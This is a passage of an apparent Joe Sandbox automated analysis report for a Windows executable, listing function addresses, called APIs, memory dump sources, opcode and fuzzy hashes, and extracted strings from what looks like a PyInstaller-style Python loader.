                                                                                      • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                      • Instruction Fuzzy Hash: 8D41DC3291D24147EBBCABA5A540179FB60EB55B40F500331DAAE5B6D1CF2DF482CBB2
                                                                                      Function 00007FF7F3DD7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 840049012-0
                                                                                      • Opcode ID: 2a0c301101eb402f2b31e30b1b20f502c945bb9c257f0de025133b49b19250c2
                                                                                      • Instruction ID: efa39872125dee99157335fe45bcaf478e737cba8b045686d1e1c1bdc4d491cf
                                                                                      • Opcode Fuzzy Hash: 2a0c301101eb402f2b31e30b1b20f502c945bb9c257f0de025133b49b19250c2
                                                                                      • Instruction Fuzzy Hash: 3821A021B1875246EB95BAA278047BAE651BF45BC4FCC4430EE2D2F7C6CE7DE051C291
                                                                                      Function 00007FF7F3DEB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                      • Instruction ID: f25f6201f0aba044079576883f04893202c440ab90d302f24165cf27d36e02d5
                                                                                      • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                      • Instruction Fuzzy Hash: 0F317462E1D51285E7997B95884137DAE60AF40B90FC10335DD7D2B3D2CEBCB48187B2
                                                                                      Function 00007FF7F3DE5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                      • Instruction ID: b58d7c0d78d1c6126c9d7c1a35204663b86478a60ec7d8633fbadbe7675dc44c
                                                                                      • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                      • Instruction Fuzzy Hash: 5911A421A1C64681EBA8BF91941017DEB61AF85FC0FC44231EA5C6FAD6CF3CE48047A2
                                                                                      Function 00007FF7F3DF6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                      • Instruction ID: 14259911fba10b205ab8575d644cddd9fc2360b8aaefc027a9b3d251bded4283
                                                                                      • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                      • Instruction Fuzzy Hash: 1121D732A0CA4286DBA5AF78D480379B6A0FB84B54F984234E77D5BAD9DF3DD4018B50
                                                                                      Function 00007FF7F3DE03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                      • Instruction ID: c9f0d628ee82bd35dae614c88d92064c933dfc9787066245639ea2bcdb687a73
                                                                                      • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                      • Instruction Fuzzy Hash: 5D01A522A0874640E788EFA39900069EA95BF85FE0F884731DE7C2BBD6CE3CD4818351
                                                                                      Function 00007FF7F3DE7EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                      • Instruction ID: 9c982049cd8a64dd0455f80ce3915c47b44d8e7a55e474b2ed61f66df9756f68
                                                                                      • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                      • Instruction Fuzzy Hash: C1015720E1D68340FFE87AA5A94117D9990AF407A0FC44375EA3D6A6C6EF2CE48142B2
                                                                                      Function 00007FF7F3DE8238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                      • Instruction ID: 4b4e0036958f40a082c57f9eae376150ea58787ceb6798bf4fe1c32620904d10
                                                                                      • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                      • Instruction Fuzzy Hash: 0EE0B650E1860786FBDD3AE4898217999205F95B40FC14634E9293E2C3DD6C69C567B3
                                                                                      Function 00007FF7F3DEEB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF7F3DEB32A,?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A), ref: 00007FF7F3DEEBED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                      • Instruction ID: c89078cfa60f865cd5b11204600f2da3ca5bcc4f5ca5a1c7cd9a8af113623805
                                                                                      • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                      • Instruction Fuzzy Hash: 95F04F54F0A21240FFDE76E558512B5DA905F98B40FCC4630C92FAE3C1DEACE4C082B2
                                                                                      Function 00007FF7F3DED5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7F3DE0C90,?,?,?,00007FF7F3DE22FA,?,?,?,?,?,00007FF7F3DE3AE9), ref: 00007FF7F3DED63A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                      • Instruction ID: 4f944dcf989c4b4655febcb2b889ee8b29304b54bc750c377853fe1727b1abd1
                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                      • Instruction Fuzzy Hash: A5F0FE10F0924B49FFD977F1584177999905F947A4F880734DD3E6E2C5DD6CA4C086B2

                                                                                      Non-executed Functions

                                                                                      Function 00007FF7F3DD5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5840
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5852
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5889
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD589B
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58B4
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58C6
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58DF
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58F1
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD590D
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD591F
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD593B
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD594D
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5969
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD597B
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5997
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59A9
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59C5
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59D7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                      • API String ID: 199729137-653951865
                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction ID: 0de6f68d3225384e993f8530148b715efc1bdc2936629a268c8503234246543b
                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction Fuzzy Hash: B322AC6490EB0B91FBD5BBE5B890574B361AF05795FC41035D83E2A2D8EF3CB16892E0
                                                                                      Function 00007FF7F3DF40AC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 808467561-2761157908
                                                                                      • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                      • Instruction ID: 780b6cf53771bb597d6389d0adc5754d3a403e81600ac74437f3c6d6ac4647bd
                                                                                      • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                      • Instruction Fuzzy Hash: 34B2B772E182824BE7A59EB4D4807FDB7B1FB54348F905135DA3D6BAC8DB38A500CB90
                                                                                      Function 00007FF7F3DD83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD842B
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84AE
                                                                                      • DeleteFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84CD
                                                                                      • FindNextFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84DB
                                                                                      • FindClose.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84EC
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                      • String ID: %s\*
                                                                                      • API String ID: 1057558799-766152087
                                                                                      • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction ID: d104ce573da2afe3cc8f65e3ca4dda28ce192aa84e5df8c9beee24b0e23e353d
                                                                                      • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction Fuzzy Hash: 57415521A0C54285EBA1BBB4E4941FAB361FB94754FC00231D97E6B7D8DF3CE5498790
                                                                                      Function 00007FF7F3DDACAD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                      • API String ID: 0-2665694366
                                                                                      • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                      • Instruction ID: ee0a07d1a990cd9b53e6c6a81cbfb5da2d1737dafaf08342e144390a14a0f465
                                                                                      • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                      • Instruction Fuzzy Hash: E3522972A146A64BD7E89F64C458B7D7BADFB44344F818139EA5A9B7C0DB3CD800CB90
                                                                                      Function 00007FF7F3DDD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3140674995-0
                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction ID: f02e511d704974825d1110e40f2446076dbc38835b2a37fc8baf5b5eafcf440e
                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction Fuzzy Hash: AC314572609B8186EBA09FA0E8807ED7364FB85748F444039DA5D5BBD9DF3CD648C760
                                                                                      Function 00007FF7F3DF5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
